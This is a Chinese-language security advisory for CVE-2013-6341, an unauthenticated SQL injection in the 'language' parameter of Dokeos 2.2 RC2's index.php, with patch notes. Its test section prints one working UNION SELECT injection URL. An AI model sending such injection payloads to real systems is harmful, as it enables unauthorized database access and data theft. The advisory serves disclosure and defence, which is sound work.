Dokeos 2.2 RC2 SQL注入漏洞

发布日期:2013-11-27
更新日期:2013-11-30

受影响系统:
Dokeos e-learning Dokeos <= 2.2 RC2
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2013-6341

Dokeos是一个开源网上教育与课程管理系统。

Dokeos 2.2 RC2及之前版本没有正确验证"/index.php"的"language" HTTP GET参数值,未经身份验证的远程攻击者可利用此漏洞在应用的数据库内执行任意SQL命令。

<*来源:vendor
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

[host]/index.php?language=0%27%20UNION%20SELECT%201,2,3,4,version
%28%29,6,7,8%20--%202

建议:
--------------------------------------------------------------------------------
厂商补丁:

Dokeos e-learning
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

非官方补丁:
https://www.htbridge.com/advisory/HTB23181-patch.zip

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/c2fad5bc9285ea59a906cc36d2a7d699.html